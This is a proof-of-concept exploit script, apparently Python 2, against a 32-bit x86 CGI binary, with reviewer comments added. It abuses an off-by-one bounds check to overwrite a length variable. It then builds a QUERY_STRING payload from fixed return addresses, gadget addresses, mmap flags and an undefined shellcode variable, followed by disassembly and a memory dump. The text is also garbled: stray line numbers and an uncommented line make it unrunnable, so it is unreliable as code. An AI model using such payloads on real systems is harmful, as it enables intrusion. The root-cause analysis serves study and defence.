# NOTE(review): proof-of-concept scratch script for a 32-bit x86 CGI binary loaded at a
# fixed base (every address below is an absolute 0x0804xxxx value, i.e. the target was
# presumably built without PIE). Bytes-as-str concatenation suggests Python 2. The
# payload bytes are kept exactly as the author wrote them; the comments added here only
# name the bug class and what the fix on the defending side looks like.
#
# Root cause, per the author's reconstruction of the target (C-like pseudo-code quoted in
# the comments that follow): the bounds check `if ( i > 32 ) break;` still accepts
# i == 32, so a 33-character value writes one byte past the buffer it guards and lands on
# the adjacent length variable (`lenCheck`). The correct check is `i >= 32` (better:
# `i >= sizeof(buf)`); a 32-byte buffer is inferred from the `> 32` test only --
# TODO confirm against the binary. Stack protectors and PIE+ASLR would additionally have
# removed the fixed addresses this script depends on.
t_s = "9"*33   #Trigger off by one overflow at
# 33 bytes: exactly one more than the `> 32` check lets through before the break.
    # for ( i = 0; i < strlen(ptr_query); ++i )
        #{
        #if ( i > 32 )
        #{
            #printf("ERROR t_s size\n");
    #        break;
        #}
    # So length check at
    #for ( j = 0; ; ++j )
        #{
        #len = strlen(ptr_query);
        #if ( j >= (unsigned int)len )
        #break;
        #if ( j > lenCheck )                       // val8 changes by 1 byte ==> 0xff
        #{
        #   printf("ERROR v size\n");
        #   exit(-1);
        #}
    # now lenCheck has value 0x39 ( "9" )
    # i.e. the overflowed byte ("9" == 0x39) becomes the bound used for the second
    # check, which is what lets the long `v` value below pass -- author's claim, not
    # verifiable from this paste.
#t_s  = "1339261782"+"9"*23
# `sc` is never defined anywhere in this paste; as written the next line raises NameError.
vBuff = "1"*12+"1"*18+sc
#vBuff = "pOFogiGf"+"\xcc"*24
# Each of the following 4-byte strings is a little-endian 32-bit address; the author's
# disassembly of the target is quoted under each one.
agent = "\x63\x88\x04\x08"
   #0x8048863 <vprintf@plt+15>:  (bad)  => to align with "[
   #0x8048864 <sprintf@plt>:     jmp    DWORD PTR ds:0x804b034
   #0x804886a <sprintf@plt+6>:   push   0xd0
 
charAt0 = "\x3c\x90\x04\x08"
  # Point to 0x00
    #( !*charAt0 && *charAt100 )
        #{
        #   jumpout(0);
        #   return -1;
        #}
 
rport =  "\xca\x8b\x04\x08"
    #   0x8048bca:   push   esi
    #   0x8048bcb:   push   ebx
    #   0x8048bcc:   lea    eax,[ebp-0x44]
    #   0x8048bcf:   lea    edi,[ebp-0x44]
    #   0x8048bd2:   mov    esi,0x8049d20
    #   0x8048bd7:   cld
charAt100 = "\xff\x8f\x04\x08"
    #Same as charAt0
 
raddr ="\xc9\x8b\x04\x08"
    #Same as rport
 
mmflag = "\x01\x01\x01\x32"
    # MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS
    # On Linux/x86 that combination is 0x02|0x10|0x20 == 0x32, which is only the
    # high byte of the little-endian dword 0x32010101 this string encodes; how the
    # target consumes the field is not visible here -- confirm before relying on it.
# Concatenation order is the in-memory layout the overflow produces: `vBuff` first,
# then six 4-byte fields in this exact sequence. Reordering any term changes the payload.
v =   vBuff + agent  + charAt0     + rport     + charAt100    + raddr   + mmflag
# CGI environment variable name; `v` and `t_s` are presumably the two parameters the
# target parses out of it (`ptr_query` in the quoted pseudo-code).
QUERY_STRING = "q=sent&v="+v+"&t_s="+t_s
  54.  
# Since we have esi -> query string, we find some gadgets to push esi onto the stack and use it as a parameter to
# the sprintf call
  57. #x/40i 0
  58. #   0x0: pop    ebx
  59. #   0x1: push   edi
  60. #   0x2: push   esi
  61. #   0x3: push   ebx
  62. #   0x4: lea    eax,[ebp-0x44]
  63. #   0x7: lea    edi,[ebp-0x44]
  64. #   0xa: mov    esi,0x8049d20
  65. #   0xf: cld
  66. #   0x10:        mov    ecx,0x565b5d0f
  67. #   0x15:        push   ebx
  68. #   0x16:        lea    eax,[ebp-0x44]
  69. #   0x19:        lea    edi,[ebp-0x44]
  70. #   0x1c:        mov    esi,0x8049d20
  71. #   0x21:        cld
  72. #   0x22:        mov    ecx,0xff5b5d0f
  73. #   0x27:        jmp    DWORD PTR ds:0x804b034
  74.  
  75. After 0x27:        jmp    DWORD PTR ds:0x804b034
  76.  
  77. #0x0:    0x3935ac11      0x31313131      0x31313131      0x31313131
  78. #0x10:   0x31313131      0x31313131      0x31313131      0xeb313131
  79. #0x20:   0x08048863      0x0804903c      0x08048bca      0x08048fff
  80. #0x30:   0x08048bc9      0x32010101      0x735f7426      0x3939393d
  81. #0x40:   0x39393939      0x39393939      0x39393939      0x39393939
  82. #0x50:   0x39393939      0x39393939      0x39393939      0x6d263939
  83. #0x60:   0x9090903d      0x90909090      0x90909090      0x90909090
  84. #0x70:   0x90909090      0x90909090      0x90909090      0x90909090